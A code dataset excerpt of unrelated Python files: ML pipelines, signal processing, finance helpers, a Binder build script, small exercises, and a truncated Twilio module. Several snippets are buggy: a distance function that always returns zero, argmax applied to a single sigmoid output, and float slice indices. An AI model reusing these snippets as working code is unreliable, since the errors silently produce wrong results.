context):\n\n x1, y1 = ld1['rect']['x'], ld2['rect']['y']\n x2, y2 = ld1['rect']['x'], ld2['rect']['y']\n\n width_diff = min(MAX_WIDTH, abs(x2-x1)) # cap height and width at 2500 and 1300\n height_diff = min(MAX_HEIGHT, abs(y2-y1))\n\n dist = math.sqrt(\n (width_diff**2) + (height_diff**2)\n )\n\n return dist / MAX_DIST\n","sub_path":"visual_webscraper/clustering/comparisons/euclidean_distance.py","file_name":"euclidean_distance.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"222151393","text":"import pandas as pd\nimport numpy as np\nimport math\nimport pickle\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import KFold\n\nimport platform\nfrom os import listdir\nfrom os.path import isfile, join\nfrom glob import glob\nfrom pathlib import Path\nimport sys\nimport os\nimport copy\nimport traceback\nimport timeit\nimport random\n\n\nimport matplotlib.pyplot as plt\n\nimport birch\nfrom predictor_advance_v1 import *\nimport utils\n\n\nfrom multiprocessing import Pool, cpu_count\nfrom threading import Thread\nfrom multiprocessing import Queue\n\n# import metrices\n\nimport sys\nimport traceback\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nclass ThreadWithReturnValue(Thread):\n def __init__(self, group=None, target=None, name=None,\n args=(), kwargs={}, Verbose=None):\n Thread.__init__(self, group, target, name, args, kwargs)\n self._return = None\n def run(self):\n #print(type(self._target))\n if self._target is not None:\n self._return = self._target(*self._args,\n **self._kwargs)\n def join(self, *args):\n Thread.join(self, *args)\n return self._return\n\n\n\nclass Bellwether(object):\n\n def __init__(self,data_path,attr_df, goal, month):\n self.directory = data_path\n self.attr_df = attr_df\n self.cores = cpu_count()\n self.goal = goal\n self.metrics = 0\n self.month = month\n\n \n def prepare_data(self, repo_name):\n df_raw = pd.read_csv(self.directory + repo_name, sep=',')\n df_raw = df_raw.drop(columns=['dates']) \n last_col = utils.get_goal(self.goal)\n cols = list(df_raw.columns.values)\n cols.remove(last_col)\n df_adjust = df_raw[cols+[last_col]]\n return df_adjust\n\n\n # Cluster Driver\n def cluster_driver(self,df,print_tree = True):\n X = df.apply(pd.to_numeric)\n cluster = birch.birch(branching_factor=20)\n cluster.fit(X)\n cluster_tree,max_depth = cluster.get_cluster_tree()\n if print_tree:\n cluster.show_clutser_tree()\n return cluster,cluster_tree,max_depth\n\n def build_BIRCH(self):\n goal_name = utils.get_goal(self.goal)\n # self.attr_df = self.attr_df.drop(goal_name, axis = 1)\n # print(goal_name,self.attr_df.columns)\n cluster,cluster_tree,_ = self.cluster_driver(self.attr_df)\n return cluster,cluster_tree\n\n \n def bellwether(self,selected_projects,all_projects):\n final_score = {}\n final_model = {}\n count = 0\n for s_project in selected_projects:\n try:\n data = self.prepare_data(s_project)\n print(s_project)\n list_temp, model_touse = DECART_bellwether(data, self.metrics, \n self.month, all_projects, s_project, \n self.directory, self.goal)\n final_score[s_project] = list_temp\n final_model[s_project] = model_touse\n except ArithmeticError as e:\n print(e)\n continue\n return [final_score, final_model]\n\n def run_bellwether(self,projects):\n threads = []\n results = {}\n models = {}\n _projects = projects\n split_projects = np.array_split(_projects, self.cores)\n for i in range(self.cores):\n print(\"starting thread \",i)\n t = ThreadWithReturnValue(target = self.bellwether, args = [split_projects[i],projects])\n threads.append(t)\n for th in threads:\n th.start()\n for th in threads:\n response = th.join()\n results.update(response[0])\n models.update(response[1])\n return results,models\n\n def run(self,selected_projects,cluster_id,data_store_path):\n print(cluster_id)\n final_score, models = self.run_bellwether(selected_projects)\n data_path = Path(data_store_path + utils.get_goal(self.goal) + '/' + str(cluster_id))\n if not data_path.is_dir():\n os.makedirs(data_path)\n with open(data_store_path + utils.get_goal(self.goal) + '/' + str(cluster_id) + '/goal_' + str(self.goal) + '.pkl', 'wb') as handle:\n pickle.dump(final_score, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \n with open(data_store_path + utils.get_goal(self.goal) + '/' + str(cluster_id) + '/goal_' + str(self.goal) + '_models.pkl', 'wb') as handle:\n pickle.dump(models, handle, protocol=pickle.HIGHEST_PROTOCOL)\n # df = pd.read_pickle(data_store_path + str(cluster_id) + '/700_RF_default_bellwether.pkl')\n\n\nif __name__ == \"__main__\":\n month = 6\n cores = cpu_count()\n for i in range(7):\n print('Running Goal:', i)\n goal = utils.get_goal(i)\n start = timeit.default_timer()\n path = 'data/data_use/'\n meta_path = 'results/month_' + str(month) + '_models/' + goal + '/train_data.pkl'\n data_store_path = 'results/month_' + str(month) + '_models/'\n attr_df = pd.read_pickle(meta_path)\n project_list = list(attr_df.index)\n project_list = project_list\n\n threads = []\n results = {}\n models = {}\n split_projects = np.array_split(project_list, cores)\n\n bell = Bellwether(path,attr_df,i,month)\n for i in range(cores):\n print(\"starting thread \",i)\n t = ThreadWithReturnValue(target = bell.bellwether, args = [split_projects[i],project_list])\n threads.append(t)\n for th in threads:\n th.start()\n for th in threads:\n response = th.join()\n results.update(response[0])\n models.update(response[1])\n \n print(results)\n\n with open(data_store_path + goal + '/default_bellwether.pkl', 'wb') as handle:\n pickle.dump(results, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \n with open(data_store_path + goal + '/default_bellwether_models.pkl', 'wb') as handle:\n pickle.dump(models, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n\n\n\n\n","sub_path":"Project_Health/src/default_bellwether.py","file_name":"default_bellwether.py","file_ext":"py","file_size_in_byte":6482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"417731917","text":"import pylab as pl\n\nsr = 44100.\nf1 = 3000\nf2 = 200.\nN = 10\n\nt = pl.arange(0,sr)\nw = 2*pl.pi*f1*t/sr\no = 2*pl.pi*f2*t/sr\na = 0.5\n\nsinw = pl.sin(w)\ncosmo = pl.cos((N+1)*o)\ncosno = pl.cos(N*o)\nden = 1.- 2*a*pl.cos(o) + a*a\nscal = pl.sqrt(1. - a*a/ (1+a*a*-2*a**(2*N+2)))\ns = sinw*(1 - a*a - (2*a**(N+1))*(cosmo - a*cosno))/den\ns *= scal \n \npl.figure(figsize=(8,5))\n\npl.subplot(211) \npl.plot(t[0:440]/sr,s[0:440]/max(abs(s)), 'k-')\npl.xlabel(\"time (s)\")\n\nsig = s\nN = 32768\nstart = 0\nx = pl.arange(0,N/2)\nbins = x*sr/N\nwin = pl.hanning(N)\nscal = N*pl.sqrt(pl.mean(win**2))\nsig1 = sig[start:N+start]\nwindow = pl.fft(sig1*win/max(sig1))\nmags = abs(window/scal)\nspec = 20*pl.log10(mags/max(mags))\n\npl.subplot(212) \npl.plot(bins,spec[0:N/2], 'k-')\npl.ylim(-60, 1)\npl.ylabel(\"amp (dB)\", size=16)\npl.xlabel(\"freq (Hz)\", size=16)\npl.yticks()\npl.xticks()\npl.xlim(0,sr/2)\n\npl.tight_layout()\npl.show()\n\n","sub_path":"chapter4/blsum2.py","file_name":"blsum2.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"393283113","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Dropout\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom tensorflow.keras.models import load_model\n\n#저장한 데이터 불러오기\nx=np.load('./data/keras64_x.npy')\ny=np.load('./data/keras64_y.npy')\nprint(x.shape) #(1736, 200, 200, 3)\nprint(y.shape) #(1736,)\n\n\n#1. 전처리\n#train-test split\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=77)\nx_train ,x_val, y_train, y_val = train_test_split(x_train, y_train, train_size=0.7, random_state=77)\n\n#scaling은 ImageDataGenerator 사용할 때 이미 해줌\n\n#predict 만들기 - train-test 에서 shuffle 하고 나서 해줌\nx_pred = x_test[:20]\ny_pred = y_test[:20]\n\n\n#2. 모델링\nmodel = Sequential()\nmodel.add(Conv2D(128, (3,3), padding=\"same\", input_shape=(200,200,3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=4))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128, (3,3), padding=\"same\", activation='relu'))\nmodel.add(MaxPooling2D(pool_size=3))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(64, (3,2), padding=\"same\", activation='relu'))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(64, (3,2), padding=\"same\", activation='relu'))\nmodel.add(MaxPooling2D(pool_size=3))\nmodel.add(Dropout(0.3))\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='relu'))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dense(63, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\n\n#3. 컴파일, 훈련\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"acc\"])\n\nes = EarlyStopping(monitor='val_loss',patience=100,mode='auto')\nmodelpath = './model/keras64.hdf5'\ncp = ModelCheckpoint(filepath=modelpath, monitor='val_loss',\n save_best_only=True, mode='auto')\nmodel.fit(x_train,y_train,epochs=500,batch_size=32,verbose=2,callbacks=[es,cp],validation_data=(x_val,y_val)) \n\n# ���델 불러오기\nmodel = load_model('./model/keras64.hdf5')\n\n#4. 평가\nloss,acc = model.evaluate(x_test,y_test,batch_size=32)\nprint(\"loss : \",loss)\nprint(\"acc : \",acc)\n\n#5. 예측\nresult = model.predict(x_pred)\n\n# print(\"예측값 : \", result.T.reshape(10,))\n# print(\"실제값 : \", y_pred)\n\ny_predicted = np.argmax(result,axis=1) # axis가 0 이면 열, axis가 1이면 행\n\ny_predicted = list(map(int, y_predicted)) #보기 쉽게\ny_pred = list(map(int, y_pred)) #보기 쉽게\n\nprint(\"예측값 : \", y_predicted)\nprint(\"실제값 : \", y_pred)\n\n'''\nloss : 0.8301668763160706\nacc : 0.6321839094161987\n예측값 : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n실제값 : [1, 0, 1, 1, 1, 1, 0, 1, 1, 1]\nloss : 0.6671748757362366\nacc : 0.6264367699623108\n예측값 : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n실제값 : [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]\n'''","sub_path":"keras/keras64_ImageDataGene2.py","file_name":"keras64_ImageDataGene2.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"328611659","text":"from sympy import solve, symbols\n\n\npresent_value = float\ninterest = float\n\n\ndef coupon_bond_p(cr, f, n, i) -> present_value:\n '''\n >>> coupon_bond_p(0.1, 1000, 8, 0.1225)\n 889.2\n '''\n p=0\n c = f * cr\n for j in range(1, n+1):\n p += c/(1+i)**j\n return round((p + f/(1+i)**n), 2)\n\n\ndef coupon_bond_i(p, cr, f, n) -> interest:\n '''\n >>> coupon_bond_i(889.2, 0.1, 1000, 8)\n 0.1225\n '''\n i = symbols('i', positive=True)\n x = 0\n c = f * cr\n for j in range(1, n+1):\n x += c/(1+i)**j\n return round(solve(p - (x + f/(1+i)**n), i)[0], 4)\n\n\ndef pv_cf(cf, i, n) -> present_value:\n '''\n >>> pv_cf(110, 0.1, 1)\n 100.0\n '''\n return round((cf / (1+i)**n), 2)","sub_path":"financial_calculation.py","file_name":"financial_calculation.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"97359501","text":"#!/usr/bin/env python3\n\nimport glob\nimport os\nimport platform\nimport sys\nimport shutil\nimport subprocess\nimport re\nimport multiprocessing\nimport itertools\nfrom contextlib import contextmanager\n\n\n\n# Overall script settings\nthis_project_package = f'{os.getcwd()}/bdsg'\nthis_project_source = f'{this_project_package}/src'\nthis_project_include = f'{this_project_package}/include'\nthis_project_deps = f'{this_project_package}/deps' # Now deps come from submodules.\nbindings_dir = f'{this_project_package}/cmake_bindings'\nthis_project_namespace_to_bind = 'bdsg'\npython_module_name = 'bdsg'\n\n# We have one global notion of what an include looks like\nINCLUDE_REGEX = re.compile('^\\s*#include\\s+([\"<])(.*)([\">])')\n# We have one master list of source code extensions\nSOURCE_EXTENSIONS = ['hpp', 'cpp', 'h', 'cc', 'c']\n\ndef clone_repos():\n ''' download the most recent copy of binder from git '''\n if not glob.glob(\"binder\"):\n print(\"Binder not found, cloning repo...\")\n subprocess.check_call(['git', 'clone', 'https://github.com/RosettaCommons/binder.git', 'binder'])\n parent = os.getcwd()\n os.chdir('binder')\n subprocess.check_call(['git', 'checkout', 'ee2ecff151d125c3add072a7765aebad6f42a70d'])\n os.chdir(parent)\n\ndef build_binder():\n '''\n Check for binder executable in the location we expect it.\n If it's not there, build binder with the included script.\n Expects to run in the binder directory.\n :return: location of executable, relative to project directory\n '''\n if not glob.glob(\"./build/*/*/bin/*\"):\n print(\"Binder not compiled, using packaged build.py...\")\n # Make Binder use out pybind11 version\n subprocess.check_call(['sed', '-i', \"s/^_pybind11_version_ = .*/_pybind11_version_ = '5b0a6fc2017fcc176545afe3e09c9f9885283242'/g\", 'build.py'])\n # TODO: Use CPU counting that accounts for container quotas?\n subprocess.check_call([sys.executable, 'build.py', '--jobs', str(multiprocessing.cpu_count())])\n return \"binder/\" + glob.glob('./build/*/*/bin/')[0] + \"binder\"\n\ndef all_sources_and_headers(include_deps=False):\n '''\n Find all source or include files relevant to the project.\n Yields their paths.\n \n Note that we count the libhandlegraph sources as part of this project's\n sources. We include them even if include_deps is false and we aren't\n including the other dependencies.\n '''\n \n # And the paths we want to look in.\n # Always include libhandlegraph.\n paths = [f'{this_project_source}/**/*', f'{this_project_include}/**/*', f'{this_project_deps}/libhandlegraph/src/**/*']\n if include_deps:\n # Include all dependencies if asked\n paths.append(f'{this_project_deps}/**/*')\n # Get an iterable of glob iterables that search all combinations\n all_globs = (glob.glob(f'{f}.{e}', recursive=True) for f, e in itertools.product(paths, SOURCE_EXTENSIONS))\n # Deduplicate overlapping globs\n seen = set()\n for filename in itertools.chain.from_iterable(all_globs):\n if filename not in seen:\n yield filename\n seen.add(filename)\n \n # files = list()\n # searchroot = os.path.abspath(f'{this_project_source}/../')\n # for (root,dirs,fils) in os.walk(searchroot):\n # for fl in fils:\n # if(fl.endswith((\"hpp\",\"cpp\",\"h\",\"cc\",\"c\")) and (\"src\" in root or \"include\" in root)):\n # files.append(root+\"/\"+fl)\n # print(f'found source files {files}')\n # for filename in files:\n \n \n\n@contextmanager\ndef clean_includes():\n '''\n Goes through source code and replaces all quote-format includes with carrot-style includes on entry.\n\n Reverts changes on exit.\n '''\n changes_made = dict()\n # find instances of includes we need to change\n for filename in all_sources_and_headers():\n changes_made[filename] = list()\n with open(filename, 'r') as fh:\n for line in fh:\n match = INCLUDE_REGEX.match(line)\n if match:\n replacement = line[:match.start()] + f'#include <{match.group(2)}>' + line[match.end():]\n changes_made[filename].append((line, replacement))\n if not changes_made[filename]:\n del changes_made[filename]\n # edit files we need to alter and then resave them\n for filename in changes_made.keys():\n filedata = \"\"\n listInd = 0\n with open(filename, 'r') as fh:\n for line in fh:\n if listInd < len(changes_made[filename]) and line == changes_made[filename][listInd][0]:\n filedata += changes_made[filename][listInd][1]\n listInd += 1\n else:\n filedata += line\n with open(filename, 'w') as fh:\n fh.write(filedata)\n try:\n yield\n finally:\n for filename in changes_made.keys():\n filedata = \"\"\n listInd = 0 \n with open(filename, 'r') as fh:\n for line in fh:\n if listInd < len(changes_made[filename]) and line == changes_made[filename][listInd][1]:\n filedata += changes_made[filename][listInd][0]\n listInd += 1\n else:\n filedata += line\n with open(filename, 'w') as fh:\n fh.write(filedata)\n \n\ndef make_all_includes():\n '''\n Generates an .hpp file with all includes in this project that need to be bound.\n We collect all the include directives from this project's sources.\n '''\n \n all_includes = []\n all_include_filename = 'all_cmake_includes.hpp'\n \n for filename in all_sources_and_headers(include_deps=False):\n # Then for each file found by any search\n with open(filename, 'r') as fh:\n for line in fh:\n if 'BINDER_IGNORE' in line:\n # Skip includes that are maybe not available on all systems\n continue\n # Look at each line\n match = INCLUDE_REGEX.match(line)\n if match:\n # This is an include directive that makes sense to include here. Parse it\n is_relative = match.group(1) == '\"'\n included_path = match.group(2)\n assert (match.group(1) == '\"') == (match.group(3) == '\"'), \"Mismatched include delimiters in \" + filename + \" for \" + included_path\n \n # Relative includes arent really relative paths so we can't really resolve them.\n \n # Just collect all the includes as <>\n all_includes.append(f'#include <{included_path}>')\n all_includes = list(set(all_includes))\n # This is to ensure that the list is always the same and doesn't\n # depend on the filesystem state. Not technically necessary, but\n # will cause inconsistent errors without it.\n all_includes.sort()\n with open(all_include_filename, 'w') as fh:\n # Start by always including the binding-generation-time hook file, with\n # things Binder needs to see to generate good bindings.\n fh.write('#include \\n')\n for include in all_includes:\n fh.write(f'{include}\\n')\n return all_include_filename\n \n \ndef postprocess_bindings():\n '''\n Modify generated bindings files to correct Binder's STL-version-dependent code to portable code.\n '''\n \n # We apply each of these to all source files with sed.\n transformations = ['s/class std::__cxx11::basic_string/std::string/g', # We can't leave \"class\" in front of a non-template\n 's/std::__cxx11::basic_string/std::string/g']\n # TODO: Add transformations to catch problems from libc++ STL\n \n for (directory, subdirectories, files) in os.walk(bindings_dir):\n for filename in files:\n if os.path.splitext(filename)[1].lstrip('.') in SOURCE_EXTENSIONS:\n # For each source file, get its full path from where our process is\n full_path = os.path.join(directory, filename)\n for transformation in transformations:\n # Apply all the transformations\n subprocess.check_call(['sed', \"-i.bak\", transformation, full_path])\n os.unlink(full_path + '.bak')\n\n\ndef make_bindings_code(all_includes_fn, binder_executable):\n ''' runs the binder executable with required parameters '''\n # Find all the include directories for dependencies.\n # Some dependency repos have an include and some have an src/include.\n # BBHash and sparsepp have weird project structures and needs to be handled specially.\n proj_include = (glob.glob(f'{this_project_deps}/*/include') +\n glob.glob(f'{this_project_deps}/*/src/include') +\n [f'{this_project_deps}/sparsepp',\n f'{this_project_deps}/BBHash'])\n # proj_include = \" -I\".join(proj_include)\n proj_include = [f'-I{i}' for i in proj_include]\n \n command = [binder_executable,\n \"--root-module\", python_module_name,\n \"--prefix\", f'{bindings_dir}/',\n '--bind', this_project_namespace_to_bind,\n \"--config\", \"config.cfg\",\n all_includes_fn,\n \"--\",\n \"-std=c++14\",\n f'-I{this_project_include}']\n if platform.system() == 'Darwin':\n # We need the MacOS SDK, which provides the C standard library and also a C++ STL, at least as of Apple Clang 14.\n sdk_path=subprocess.check_output(['xcrun', '-sdk', 'macosx', '--show-sdk-path']).decode('utf8').strip()\n command.append('-isysroot' + sdk_path)\n # Also make sure to look for libomp from macports or homebrew, like CMakeLists.txt does\n command.append('-I/opt/local/include/libomp')\n command.append('-I/usr/local/include')\n\n # Find Jansson\n jansson_flags = subprocess.check_output(['pkg-config', '--cflags', 'jansson']).decode('utf-8').strip().split(' ')\n command += jansson_flags\n\n command = command + proj_include\n command.append(\"-DNDEBUG\")\n command.append(\"-v\")\n print('BINDER COMMAND:', ' '.join(command))\n \n shutil.rmtree(bindings_dir, ignore_errors=True)\n os.mkdir(bindings_dir)\n subprocess.check_call(command)\n \n # Do some post-processing on the bindings\n postprocess_bindings()\n \n\n \ndef main():\n clone_repos()\n parent = os.getcwd()\n os.chdir(\"binder\")\n binder_executable = build_binder()\n os.chdir(parent)\n with clean_includes():\n all_includes_fn = make_all_includes()\n make_bindings_code(all_includes_fn, binder_executable)\n\nif __name__ == '__main__':\n main()\n","sub_path":"make_and_run_binder.py","file_name":"make_and_run_binder.py","file_ext":"py","file_size_in_byte":10805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"68548617","text":"import os\ndef count_word(path):\n with open(path,'r') as f:\n lines = f.readlines()\n words_num = 0\n for line in lines:\n if line == '\\n':\n continue\n else:\n for symbol in ['\\n','#',' ']:\n line = line.strip(symbol)\n words = line.split(' ')\n words_num += len(words)\n return words_num\n\nfn = \"C:/Users/lenovo/Desktop/readme.md\"\nif os.path.isfile(fn):\n words_num = count_word(fn)\n print('There are {} words in file {}.'.format(words_num,fn))\nelse:\n print('The file does not exist.')\n","sub_path":"f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"391878312","text":"from datetime import date\r\ndays=['Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sunday']\r\nprint(days[date.weekday(date.today())])\r\nimport webbrowser\r\nwebbrowser.open('https://www.youtube.com/watch?v=QJbpJQscn9E&t=113s')\r\nimport os\r\nos.rename('file.txt','file.jpg')\r\n\r\n\r\n# regex assignment\r\n\r\n#ques 1\r\nimport re\r\n\r\nemails=''' abc@gmail.com\r\n xyz@yahoo.com\r\n jainyz.yahoo.com\r\n str892@gmail.@com\r\n dj_a@hotmail.com'''\r\npattern= re.compile('[a-zA-Z0-9_.]+@{1}[a-zA-Z0-9]+\\.[a-zA-Z0-9]+')\r\nmatches= pattern.findall(emails)\r\nfor i in matches:\r\n print(i)\r\n#ques 2\r\nnumbers=''' +91123456789 +8 23658974 +91-987654321 +91-8652398745 +91-6230525302 '''\r\npattern = re.compile(r'[+]91-[6-9][0-9]{9}')\r\nmatches = pattern.findall(numbers)\r\nfor i in matches:\r\n print(i)\r\n","sub_path":"assign11.py","file_name":"assign11.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"295618019","text":"class Solution:\n \"\"\"\n @param: chars: The letter array you should sort by Case\n @return: nothing\n \"\"\"\n def sortLetters(self, chars):\n length = len(chars)\n l_index, r_index = 0, length - 1\n while l_index < r_index:\n if chars[l_index].islower():\n l_index += 1\n continue\n if chars[r_index].isupper():\n r_index -= 1\n continue\n chars[l_index], chars[r_index] = chars[r_index], chars[l_index]\n l_index += 1\n r_index -= 1\n","sub_path":"lc0049_sort_letters_by_case.py","file_name":"lc0049_sort_letters_by_case.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599788333","text":"from pytorch_lightning import Trainer, seed_everything\n\n\n\n\nclass AlgorithmTrainer(Trainer):\n\n \"\"\"\n this class overides the trainer training loop in order to add custom\n reinforcement learning functionality\n \"\"\"\n\n def __init__(self):\n super(AlgorithmTrainer, self).__init__()\n\n @override\n def train(self):\n self.run_sanity_check(self.get_model())\n\n # enable train mode\n model = self.get_model()\n model.train()\n torch.set_grad_enabled(True)\n\n # reload data when needed\n self.train_loop.reset_train_val_dataloaders(model)\n\n # hook\n self.train_loop.on_train_start()\n\n try:\n # run all epochs\n for epoch in range(self.current_epoch, self.max_epochs):\n\n # reset train dataloader\n if self.reload_dataloaders_every_epoch:\n self.reset_train_dataloader(model)\n\n # hook\n self.train_loop.on_train_epoch_start(epoch)\n\n # run train epoch\n self.train_loop.run_training_epoch()\n\n if self.max_steps and self.max_steps <= self.global_step:\n\n # hook\n self.train_loop.on_train_end()\n return\n\n # update LR schedulers\n self.optimizer_connector.update_learning_rates(interval='epoch')\n\n # early stopping\n met_min_epochs = epoch >= self.min_epochs - 1\n met_min_steps = self.global_step >= self.min_steps if self.min_steps else True\n\n if self.should_stop:\n if (met_min_epochs and met_min_steps):\n self.train_loop.on_train_end()\n return\n else:\n log.info('Trainer was signaled to stop but required minimum epochs'\n f' ({self.min_epochs}) or minimum steps ({self.min_steps}) has'\n ' not been met. Training will continue...')\n\n # hook\n self.train_loop.on_train_end()\n\n except KeyboardInterrupt:\n rank_zero_warn('Detected KeyboardInterrupt, attempting graceful shutdown...')\n\n # user could press ctrl+c many times... only shutdown once\n if not self.interrupted:\n self.interrupted = True\n self._state = TrainerState.INTERRUPTED\n self.on_keyboard_interrupt()\n\n # hook\n self.train_loop.on_train_end()","sub_path":"src/algorithm/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498837819","text":"# Recebe 4 notas e imprime notas e sua média\n\nnotas = []\ncontador = 0\nsoma = 0\n\nwhile contador < 4:\n n = float(input('Digite a nota: '))\n notas.append(n)\n soma += n\n contador += 1\n\nprint('Notas: ', notas)\nprint('Média: %5.2f' % (soma / contador))\n\n","sub_path":"TWP200/TWP274.py","file_name":"TWP274.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"150168825","text":"s3 = Sentence('Pig and Pepper') # Obtain an iterator from s3.\nit = iter(s3)\nit # \n\nnext(it) # 'Pig'\nnext(it) # 'and'\nnext(it) # 'Pepper'\nnext(it) # StopIteration\n\n# Once exhausted, an iterator becomes useless.\nlist(it) # []\n\n# To go over the sentence again, a new iterator must be built.\nlist(iter(s3)) # ['Pig', 'and', 'Pepper']\n","sub_path":"src/language_ref/control/iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"172005344","text":"import os\n\n# path to our original dataset directory\nORIGIN_DATASET = \"Food-11\"\n\n# path to the new directory containing our images \n# after the training and testing split\nBASE_PATH = \"dataset\"\n\n# names of training, testing, validation directories\nTRAIN = \"training\"\nTEST = \"evaluation\"\nVAL = \"validation\"\n\n# list of class label names\nCLASSES = [\"Bread\", \"Dairy product\", \"Dessert\", \"Egg\", \"Fried food\",\n\t\"Meat\", \"Noodles/Pasta\", \"Rice\", \"Seafood\", \"Soup\",\n\t\"Vegetable/Fruit\"]\n\n# set the batch size\nBATCH_SIZE = 32\n\n# label encoder path\nLE_PATH = os.path.sep.join([\"output\", \"le.cpickle\"])\n\n# output directory to store extracted features (in .csv format)\nBASE_CSV_PATH = \"output\"\n\n# path to the serialized model after training\nMODEL_PATH = os.path.sep.join([\"output\", \"food11.model\"])\n\n# path to the output training history plots\nUNFROZEN_PLOT_PATH = os.path.sep.join([\"output\", \"unfrozen.png\"])\nWARMUP_PLOT_PATH = os.path.sep.join([\"output\", \"warmup.png\"])","sub_path":"Food Classification/Fine-tuning Food Classification with VGG16/utilities/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"554272061","text":"__author__ = 'Luke'\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^album/create/$', views.album_create, name='album_create'),\n url(r'^album/(?P[\\w-]+)/$', views.album_detail, name='album_detail'),\n url(r'^album/(?P[\\w-]+)/edit/$', views.album_edit, name='album_edit'),\n url(r'^album/(?P[\\w-]+)/delete/$', views.album_delete, name='album_delete'),\n url(r'^album/$', views.album_list, name='album_list'),\n url(r'^$', views.chart_view, name='chart'),\n\n]\n","sub_path":"website/music/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"240457886","text":"#!/usr/bin/env python\n\nimport argparse\nfrom i4media.logger import *\n\nimport i4media.core\nimport i4media.streaming\nimport i4media.restapi\n\n\nparser = argparse.ArgumentParser(description='i4Media-twitter Service Controller')\nparser.add_argument(\n '-s',\n '--stream',\n default=False,\n action='store_true',\n help='Starts a Streaming Service & Bridge')\nparser.add_argument(\n '-r',\n '--rest',\n default=False,\n action='store_true',\n help='Starts REST Api (Single')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n p = i4media.core.Process()\n services = []\n if args.stream:\n services.append(i4media.streaming.StreamingService())\n p.add('streaming', services[-1].stream)\n services.append(i4media.streaming.StreamingBridge())\n p.add('bridge', services[-1].start)\n if args.rest:\n services.append(i4media.restapi.RestApiBridge())\n p.add('rest', services[-1].start)\n p.start()\n","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"538335099","text":"# Copyright 2021 Canonical\n# See LICENSE file for licensing details.\n\nimport unittest\n\nfrom charm import PeerRelationDemoCharm\nfrom ops.testing import Harness\n\n# from unittest.mock import Mock\n\n\nclass TestCharm(unittest.TestCase):\n def test_config_changed(self):\n harness = Harness(PeerRelationDemoCharm)\n self.addCleanup(harness.cleanup)\n harness.begin()\n self.assertEqual(list(harness.charm._stored.things), [])\n harness.update_config({\"thing\": \"foo\"})\n self.assertEqual(list(harness.charm._stored.things), [\"foo\"])\n","sub_path":"tests/test_charm.py","file_name":"test_charm.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"149911706","text":"# functions that interact with Twilio\n# import this into server.py\n\nfrom twilio.twiml.messaging_response import MessagingResponse\nfrom twilio.rest import Client\nimport os\n\naccount_sid = os.environ['ACCOUNT_SID']\nauth_token = 